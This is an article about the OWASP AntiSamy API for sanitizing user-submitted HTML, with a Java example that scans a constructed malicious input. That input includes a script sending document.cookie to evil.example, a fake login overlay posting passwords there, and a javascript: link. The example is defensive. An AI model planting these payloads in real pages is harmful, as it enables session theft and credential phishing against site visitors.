
OWASP AntiSamy Project

Published on: 8/16/2014
Topic: Web Application Security
The OWASP AntiSamy project is available in two versions, one for Java and one for .NET. It is an API for checking that HTML supplied by a client (for a profile page, a comment, a forum post, and so on) contains no malicious markup before that HTML is persisted on the server and later rendered to other users. Rather than rejecting the input outright, AntiSamy validates it against a policy file and returns a cleaned copy of the HTML together with a list of the violations it found.


Overview

In the context of web applications, "malicious code" is usually taken to mean JavaScript alone. Cascading Style Sheets are treated as malicious only when they can invoke the JavaScript engine (for example through a script-valued expression or URL). However, there are many situations in which perfectly "normal" HTML and CSS can be used maliciously: a form that posts the reader's credentials to another site, or an absolutely positioned element that covers the legitimate page with attacker-controlled content, needs no script at all.

Typical Internet users are not skilled at writing HTML/CSS, so where does the HTML they submit come from? Usually they copy it from somewhere else on the web. Simply rejecting their input without any indication of why is jarring and annoying, and annoyed users take their social networking somewhere else. A sanitizer that cleans the input and reports what it removed keeps the users while still enforcing the site's rules.

The OWASP licensing policy allows OWASP projects to be released under any approved open source license. Under these guidelines, AntiSamy .NET is distributed under a BSD license.

Getting Started

There are four steps in the process of integrating AntiSamy:

1. Download AntiSamy from its home on Google Code.
2. Choose the standard policy file that most closely matches the functionality you need. The distribution ships several policies of varying strictness; antisamy-slashdot.xml, for example, permits only a small set of formatting tags.
3. Tailor the policy file according to your site's rules. Start from the most restrictive policy that is workable and add tags, attributes and CSS properties deliberately, rather than starting from a permissive one and trying to remove the dangerous parts.
4. Call the API from your code and persist and render only the cleaned HTML it returns, never the original input.
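The following class is an added example, not code from the page or from the AntiSamy project itself, showing the four steps above wired together with the AntiSamy Java API (the .NET version exposes the same policy/scanner/results objects with .NET naming). The class name ProfileSanitizer, the evil.example hostname and the sample input are constructed for illustration; the policy file name, the org.owasp.validator.html classes and the methods called on them are the real AntiSamy API. It assumes the AntiSamy jar and its dependencies are on the classpath and that antisamy-slashdot.xml is reachable as a file in the working directory.

```java
// Added example (not from the page or the AntiSamy project): sanitizing
// user-supplied HTML with the AntiSamy Java API and a shipped policy file.
// Assumes the AntiSamy jar and its dependencies are on the classpath and
// that antisamy-slashdot.xml is present in the working directory.
import org.owasp.validator.html.AntiSamy;
import org.owasp.validator.html.CleanResults;
import org.owasp.validator.html.Policy;
import org.owasp.validator.html.PolicyException;
import org.owasp.validator.html.ScanException;

public class ProfileSanitizer {   // hypothetical class name

    private final AntiSamy antiSamy = new AntiSamy();
    private final Policy policy;

    public ProfileSanitizer(String policyFile) throws PolicyException {
        // Step 2/3: load the (possibly tailored) policy once and reuse it;
        // parsing the XML on every request is unnecessary and slow.
        this.policy = Policy.getInstance(policyFile);
    }

    /** Step 4: returns policy-conformant HTML plus the list of violations. */
    public CleanResults sanitize(String untrustedHtml)
            throws ScanException, PolicyException {
        return antiSamy.scan(untrustedHtml, policy);
    }

    public static void main(String[] args) throws Exception {
        ProfileSanitizer sanitizer = new ProfileSanitizer("antisamy-slashdot.xml");

        // Constructed sample input. Line 2 is the classic JavaScript payload;
        // the rest is "normal" HTML/CSS of the kind the Overview warns about:
        // an absolutely positioned overlay that hides the real page and a
        // fake login form that posts the reader's password offsite.
        String untrusted = String.join("\n",
            "<p>Hi! <b>Welcome</b> to my profile.</p>",
            "<script>document.location='http://evil.example/?c='+document.cookie</script>",
            "<div style=\"position:absolute;top:0;left:0;width:100%;height:100%;background:#fff\">",
            "  <form action=\"http://evil.example/login\" method=\"post\">",
            "    Session expired, please sign in: <input name=\"password\" type=\"password\">",
            "  </form>",
            "</div>",
            "<a href=\"javascript:alert(1)\">click</a>");

        CleanResults results = sanitizer.sanitize(untrusted);

        // Store and render only the cleaned HTML, never the original string.
        System.out.println("Clean HTML:\n" + results.getCleanHTML());

        // The violation list is what lets you tell the user *why* their
        // markup was altered instead of silently rejecting it (see Overview).
        System.out.println("Policy violations: " + results.getNumberOfErrors());
        for (String message : results.getErrorMessages()) {
            System.out.println(" - " + message);
        }
        System.out.println("Scan time (s): " + results.getScanTime());
    }
}
```

Two points worth noting in practice: the policy object is loaded once and shared, since it is the expensive part, and the application keeps the CleanResults error messages so they can be shown back to the user as the reason their markup changed. Whether the overlay div and the form survive depends entirely on the policy chosen in step 2; with antisamy-slashdot.xml they do not, which is why tailoring (step 3) should start restrictive and loosen only what the site genuinely needs.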


Continue Reading: Using AntiSamy .NET